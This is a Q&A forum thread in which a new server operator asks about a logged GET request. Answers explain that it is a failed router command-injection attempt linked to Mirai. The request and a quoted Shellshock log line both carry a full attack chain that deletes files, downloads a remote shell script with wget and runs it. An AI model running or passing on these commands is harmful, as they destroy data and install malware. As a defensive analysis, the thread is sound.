# Strange GET request to my server: Should I be concerned?

Tags: linux, security, attack-vector

I'm very new to hosting and I get a get request like this:

```
GET /goform/webRead/open/?path=|rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F(ip adress)%2Fbruh.sh%3B%20chmod%20777%20bruh.sh%3B%20.%2Fbruh.sh
```

From the looks for it, it looks like someone tried to pull a script via `wget` and tried to `rm -rf`, should I be concerned?

Comment: If you don’t recognize those shell scripts, absolutely

Comment: Yes sir!  That's an attempted attack.  I JUST had a similar attempt.  Nginx log: `185.224.128.10 - - [09/Feb/2024:12:05:54 -0600] "GET /cgi-bin/test.cgi HTTP/1.1" 200 923 "-" "() { :; }; echo ; /bin/bash -c 'rm -rf *; cd /tmp; wget http://192.3.152.183/ni**a.sh; chmod 777 ni**a.sh; ./ni**a.sh" "-"`

Comment: related (seems to be a router vulnerability attack) https://isc.sans.edu/diary/Exploit+against+Unnamed+Bytevalue+router+vulnerability+included+in+Mirai+Bot/30642

Answer (score 3, accepted):

### You shouldn’t be concerned.

If your server is fine, you are fine and all you are seeing is an attempt to hack your server. A server log will log all accesses to your server including hacking attempts like this.

But again, if your server is fine then you can ignore this request. Servers on the internet are constantly being probed for vulnerabilities. As long as your server is patched and up to date, you are fine.

---

**More details**: You say this:

> “From the looks for it, it looks like someone tried to pull a script via `wget` and tried to `rm -rf`, should I be concerned?”

The key word here is “tried” not “did”; the key point is they did not succeed. Here is the breakdown of the commands sent to your server; line breaks on `;` to make things more readable:

```
rm -rf *;
cd /tmp;
wget http://(ip adress)/bruh.sh;
chmod 777 bruh.sh;
./bruh.sh
```

The script seems want to do the following:

- `rm -rf *;`: Delete everything in the working directory.
- `cd /tmp;`: Go to the `/tmp` directory.
- `wget http://(ip adress)/bruh.sh;`: Attempt to get a script named `bruh.sh` from the server at `(ip adress)`.
- `chmod 777 bruh.sh;`: Change the permissions of the `bruh.sh` script to `777`.
- `./bruh.sh`: Run the script.

### But it ultimately did 100% of nothing.

I am saying that it didn’t do anything because your server is fine, correct? If it didn’t do anything then yes it is definitely a hacking attempt. But if it didn’t do anything it failed. Logging doesn’t mean the script was eval’ed and run.

If your system is up to date, don’t be concerned. That is simply a log of a parameter string that was sent to your server and not something that was run.

Where there is a risk was flaws like the infamous [Log4j flaw](https://www.cisa.gov/news-events/news/apache-log4j-vulnerability-guidance) (Java) that allowed commands to come in exactly as you saw them in your log file… But the Log4j would eval that string and run it. And that is a definite risk.

But even Log4j is safe nowadays in 2024 since it has been patched for at least 2 years. And if you don’t run a Java server? Don’t even worry about Log4j. 100% no concern.

### Servers log all accesses.

Good, bad, successful and failed; all accesses are logged by servers. Especially servers exposed to the Internet. You cannot stop anyone from accessing your server in unwanted ways. But as long as your server is patched and up to date, you are fine.

---

**Update**: Thanks to a tip in the [comments by Yorik](https://superuser.com/questions/1829803/strange-get-request-to-my-server-should-i-be-concerned/1830118#comment2886276_1829803), this seems to be an attack on [RealTek SoC based routers made by the company BYTEVALUE](https://isc.sans.edu/diary/Exploit+against+Unnamed+Bytevalue+router+vulnerability+included+in+Mirai+Bot/30642). Details follow:

> URLs containing "goform" are typically associated with the RealTek SDK. Routers built around the RealTek SoC (System on a Chip) usually use the SDK to implement web-based access tools. The RealTek SDK had numerous vulnerabilities in the past. We currently track over 900 unique URLs in our honeypots using a "/goform/" URL. The most popular URL is usually "goform/set_LimitClient_cfg", associated with CVE-2023-26801 in LB-Link routers. But simple password brute force attacks are also common, taking advantage of default passwords.
>
> So far, I have not been able to identify a specific CVE number for vulnerabilities related to  "goform/webRead/open". However, a Chinese blog post from November suggests that this is related to a vulnerability in routers made by the Chinese company "BYTEVALUE." I could not find a patch for the vulnerability.

So unless your server is a router made by BYTEVALUE (I doubt it.) then you really and truly have no reason to be concerned. All prior advice still applies; [don’t worry be happy](https://youtu.be/d-diB65scQU).